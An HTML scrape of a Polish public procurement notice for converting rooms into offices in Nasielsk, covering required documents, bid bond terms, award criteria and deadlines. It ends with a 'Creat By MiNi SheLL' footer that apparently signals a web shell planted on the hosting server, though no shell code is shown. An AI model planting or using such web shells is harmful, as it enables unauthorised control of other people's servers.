PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a)	odpis	z	właściwego	rejestru	lub	z	centralnej	ewidencji	i	informacji	o	działalności	gospodarczej,	jeżeli	odrębne	przepisy	wymagają	wpisu	do	rejestru	lub	ewidencji,	w	celu	potwierdzenia	braku	podstaw	do	wykluczenia	na	podstawie	art.	24	ust.	5	pkt	1	ustawy	Pzp.	Zamawiający	żąda	od	Wykonawcy,	który	polega	na	zdolnościach	lub	sytuacji	innych	podmiotów	na	zasadach	określonych	w	art.	22a	ustawy	Pzp,	przedstawienia	w	odniesieniu	do	tych	podmiotów	dokumentów	wymienionych	w	lit.	a	powyżej.	Jeżeli	Wykonawca	ma	siedzibę	lub	miejsce	zamieszkania	poza	terytorium	Rzeczypospolitej	Polskiej	zamiast	dokumentów,	o	których	mowa	w	lit.	a	powyżej	składa	dokument	wystawiony	w	kraju,	w	którym	ma	siedzibę	lub	miejsce	zamieszkania	potwierdzający	odpowiednio,	że:	a)	nie	otwarto	jego	likwidacji	ani	nie	ogłoszono	upadłości,	wystawione	nie	wcześniej	niż	6	miesięcy	przed	upływem	terminu	składania	ofert	albo	wniosków	o	dopuszczenie	do	udziału	w	postępowaniu.	Jeżeli	w	kraju,	w	którym	Wykonawca	ma	siedzibę	lub	miejsce	zamieszkania	ma	osoba,	której	dokument	dotyczy,	nie	wydaje	się	dokumentów	o	których	mowa	powyżej	zastępuje	się	je	dokumentem	zawierającym	odpowiednio	oświadczenie	Wykonawcy,	ze	wskazaniem	osoby	albo	osób	uprawnionych	do	jego	reprezentacji,	lub	oświadczenie	osoby,	której	dokument	miał	dotyczyć	,	złożone	przed	notariuszem	lub	przed	organem	sadowym,	administracyjnym	albo	organem	samorządu	zawodowego	lub	gospodarczego	właściwym	ze	względu	na	siedzibę	lub	miejsce	zamieszkania	Wykonawcy	lub	miejsce	zamieszkania	tej	osoby.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)	Informacja	banku	lub	spółdzielczej	kasy	oszczędnościowo-kredytowej	potwierdzającej	wysokość	posiadanych	środków	finansowych	lub	zdolność	kredytową	Wykonawcy,	w	okresie	nie	wcześniejszym	niż	1	miesiąc	przed	upływem	terminu	składania	ofert.	Jeżeli	z	uzasadnionej	przyczyny	Wykonawca	nie	może	złożyć	dokumentów	dotyczących	sytuacji	finansowej	lub	ekonomicznej	wymaganych	przez	Zamawiającego,	może	złożyć	inny	dokument,	który	w	wystarczający	sposób	potwierdza	spełnianie	opisanego	przez	Zamawiającego	warunku	udziału	w	postępowaniu,	b)	Wykaz	robót	budowlanych	wykonanych	nie	wcześniej	niż	w	okresie	5	lat	przed	upływem	terminu składania	ofert,	a	jeżeli	okres	prowadzenia	działalności	jest	krótszy	– w	tym	okresie,	wraz	z	podaniem	ich	rodzaju,	wartości,	daty,	miejsca	wykonania	i	podmiotów,	na	rzecz	których	roboty	te	zostały	wykonane	– wg	wzoru	załącznika	nr	7	do	SIWZ	wraz	z	załączeniem	dowodów	określających	czy	te	roboty	budowlane	zostały	wykonane	należycie,	w	szczególności	informacji	o	tym	czy	roboty	zostały	wykonane	zgodnie	z	przepisami	prawa	budowlanego	i	prawidłowo	ukończone,	przy	czym	dowodami,	o	których	mowa,	są	referencje	bądź	inne	dokumenty	wystawione	przez	podmiot,	na	rzecz	którego	roboty	budowlane	były	wykonywane,	a	jeżeli	z	uzasadnionej	przyczyny	o	obiektywnym	charakterze	Wykonawca	nie	jest	w	stanie	uzyskać	tych	dokumentów	–inne	dokumenty,	c)	Wykaz	osób,	skierowanych	przez	Wykonawcę	do	realizacji	zamówienia	publicznego,	w	szczególności	odpowiedzialnych	za	świadczenie	usług,	kontrolę	jakości	lub	kierowanie	robotami	budowlanymi,	wraz	z	informacjami	na	temat	ich	kwalifikacji	zawodowych,	uprawnień,	doświadczenia	i	wykształcenia	niezbędnych	do	wykonania	zamówienia	publicznego,	a	także	zakresu	wykonywanych	przez	nie	czynności	oraz	informacją	o	podstawie	do	dysponowania	tymi	osobami	– wg	wzoru	załącznik	nr	8	do	SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.	W	terminie	3	dni	od	zamieszczenia	na	stronie	internetowej	Zamawiającego	informacji	z	otwarcia	ofert,	o	której	mowa	w	art.	86	ust.	5	ustawy	Pzp	Wykonawca	zobowiązany	jest	przekazać	Zamawiającemu	oświadczenie	o	przynależności	lub	braku	przynależności	do	tej	samej	grupy	kapitałowej,	o	której	mowa	w	art.	24	ust.	1	pkt	23	ustawy	Pzp	–załącznik	nr	4	do	SIWZ.	2.	Kompletna	oferta	musi	składać	się	z:	1)	Formularza	ofertowego	zgodnego	z	treścią	Załącznika	nr	1,	2)	Oświadczenia	o	spełnieniu	warunków	udziału	i	nie	podleganiu	wykluczeniu	z	postępowania	(zwane	dalej	Oświadczeniem)	stanowiące	wstępne	potwierdzenie,	że	Wykonawca	nie	podlega	wykluczeniu	oraz	spełnia	warunki	udziału	w	postępowaniu	– zgodne	z	treścią	Załącznika	nr	2	i	3	do	SIWZ,	3)	zobowiązania	innych	podmiotów	do	oddania	Wykonawcy	do	dyspozycji	niezbędnych	zasobów	na	potrzeby	realizacji	zamówienia	- w	oryginale	lub	kopii	poświadczonej	za	zgodność	z	oryginałem	przez	notariusza(art.	22a	ust.	2	ustawy	Pzp)	(jeżeli	dotyczy),	4)	pełnomocnictwa	- w	oryginale	lub kopii	poświadczonej	za	zgodność	z	oryginałem	przez	notariusza	(jeżeli	dotyczy),	5)	dokumentów,	z	których	wynika	prawo	do	podpisania	oferty	względnie	do	podpisania	innych	dokumentów	składanych	wraz	z	ofertą,	chyba,	że	Zamawiający	może	je	uzyskać	w	szczególności	za	pomocą	bezpłatnych	i	ogólnodostępnych	baz	danych,	w	szczególności	rejestrów	publicznych	w	rozumieniu	ustawy	z	dnia	17	lutego	2005	r.	o	informatyzacji	działalności	podmiotów	realizujących	zadania	publiczne	(Dz.U.	z	2014	poz.	1114	oraz	2016	poz.	352),	o	ile	prawo	do	ich	podpisania	nie	wynika	z	dokumentów	złożonych	wraz	z	ofertą,	6)	Pozostałych	dokumentów	– informacja	banku	lub	spółdzielczej	kasy	oszczędnościowo-kredytowej,	wykaz	robót	wraz	z	poświadczeniem	należytego	ich	wykonania,	wykaz	osób,	- składane	są	przez	Wykonawcę	najwyżej	ocenionego	w	rankingu	ofert,	na	wezwanie	Zamawiającego	w	trybie	art.	26	ust.	2	ustawy	Pzp,	7)	Odpis	z	właściwego	rejestru	lub	z	centralnej	ewidencji	i	informacji	o	działalności	gospodarczej	(KRS,	CEIDG)	składa	Wykonawca	najwyżej	oceniony	w	rankingu	ofert,	na	wezwanie	Zamawiającego	w	trybie	art.	26	ust.	2	ustawy	Pzp,	z	zastrzeżeniem,	że	jeśli	Wykonawca	w	formularzu	ofertowym	(załącznik	nr	1)	wskaże	dostępność	tego	dokumentu,	w	formie	elektronicznej	pod	określonym	adresem	internetowym	ogólnopolskiej	i	bezpłatnej	bazy	danych,	Zamawiający	pobierze	samodzielnie	z	tej	bazy	danych	wskazany	przez	Wykonawcę	dokument,	8)	Dowód	wniesienia	wadium.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający	żąda	wniesienia	wadium	w	wysokości	5.000,00	zł	(pięć	tysięcy	złotych).	2.	Wadium	wnosi	się	przed	upływem	terminu	składania	ofert.	3.	Wadium	może	być	wnoszone	w	jednej	lub	w	kilku	następujących	formach,	o	których	mowa	w	art.	45	ust.	6	ustawy	Pzp:	a)	pieniądzu,	b)	poręczeniach	bankowych	lub	poręczeniach	spółdzielczej	kasy	oszczędnościowo	- kredytowej,	z	tym	że	poręczenie	kasy	jest	zawsze	poręczeniem	pieniężnym,	c)	gwarancjach	bankowych,	d)	gwarancjach	ubezpieczeniowych,	e)	poręczeniach	udzielanych	przez	podmioty,	o	których	mowa	w	art.	6b	ust.	5	pkt	2	ustawy	z	dnia	9	listopada	2000r.	o	utworzeniu	Polskiej	Agencji	Rozwoju	Przedsiębiorczości.	4.	Z	treści	gwarancji	i	poręczeń,	o	których	mowa	w	ust.	3.	lit.	b)	- e)	powyżej	(art.	45	ust.	6	pkt	2-5	ustawy	Pzp)	musi	wynikać	bezwarunkowe,	nieodwołalne	i	na	pierwsze	pisemne	żądanie	Zamawiającego,	zobowiązanie	gwaranta	do	zapłaty	na	rzecz	Zamawiającego	kwoty	określonej	w	gwarancji. 5.	Zamawiający	zatrzymuje	wadium	wraz	z	odsetkami:	1)	jeżeli	Wykonawca,	którego	oferta	została	wybrana:	a)	odmówi	podpisania	umowy	w	sprawie	zamówienia	publicznego	na	warunkach	określonych	w	ofercie,	b)	nie	wniesie	wymaganego	zabezpieczenia	należytego	wykonania	umowy,	c)	zawarcie	umowy	w	sprawie	zamówienia	publicznego	stanie	się	niemożliwe	z	przyczyn	leżących	po	stronie	Wykonawcy.	2)	jeżeli	Wykonawca	w	odpowiedzi	na	wezwanie,	o	którym	mowa	w	art.	26	ust.	3	i	3a	ustawy	Pzp,	z	przyczyn	leżących	po	jego	stronie,	nie	złoży	oświadczeń	lub	dokumentów	potwierdzających	okoliczności,	o	których	mowa	w	art.	25	ust.	1	ustawy	Pzp,	oświadczenia,	o	którym	mowa	w	art.	25a	ust.	1	ustawy	Pzp,	pełnomocnictw	lub	nie	wyrazi	zgody	na	poprawienie	omyłki,	o	której	mowa	w	art.	87	ust.	2	pkt	3	ustawy	Pzp,	co	spowoduje	brak	możliwości	wybrania	oferty	złożonej	przez	Wykonawcę	jako	najkorzystniejszej.	6.	Wadium	wnosi	się	przed	upływem	terminu	składania	ofert.	Wadium	wnoszone	w	pieniądzu	wpłaca	się	przelewem	na	rachunek	bankowy	Zamawiającego:	66	8226	0008	2001	0000	0358	0002	BS	w	Nasielsku	Kopię	polecenia	przelewu	lub	wydruk	z	przelewu	elektronicznego	należy	złożyć	wraz	z	ofertą.	7.	Wniesienie	wadium	w	pieniądzu	przelewem	na	rachunek	bankowy	wskazany	przez	Zamawiającego	będzie	skuteczne	z chwilą	uznania	tego	rachunku	bankowego	kwotą	wadium	(jeżeli	wpływ	środków	pieniężnych	na	rachunek	bankowy	wskazany	przez	Zamawiającego	nastąpi	przed	upływem	terminu	składania	ofert).	8.	Oryginał	dokumentu	potwierdzającego	wniesienie	wadium	w	formach,	o	których	mowa	w	rozdziale	IX	ust.	3	lit.	b)	- e)	powyżej	(art.	45	ust.	6	pkt	2-5	ustawy	Pzp)	Wykonawca	składa	wraz	z	ofertą.	9.	W	przypadku	wadium	wniesionego	w	pieniądzu	oraz	z	treści	gwarancji	i	poręczeń,	o	których	mowa	w	art.	45	ust.	6	pkt	2	- 5	ustawy	Pzp,	jeżeli	wadium	będzie	wniesione	w	tych	formach,	musi	wynikać,	że	wadium	zabezpiecza	ofertę	Wykonawcy	złożoną	w	postępowaniu	o	udzielenie	zamówienia	publicznego	pn:	"Adaptacja	pomieszczeń	użytkowych	na	pomieszczenia	biurowe	przy	ul.	Kilińskiego	1/3	lok.	16,	05-190	Nasielsk",	oznaczenie	sprawy:	4/PN/2020.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>90,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres udzielonej gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zmiany	umowy	zostały	przez	Zamawiającego	przewidziane	we	wzorze	umowy,	który	stanowi	załącznik	nr	5	do	SIWZ.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-09-28</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com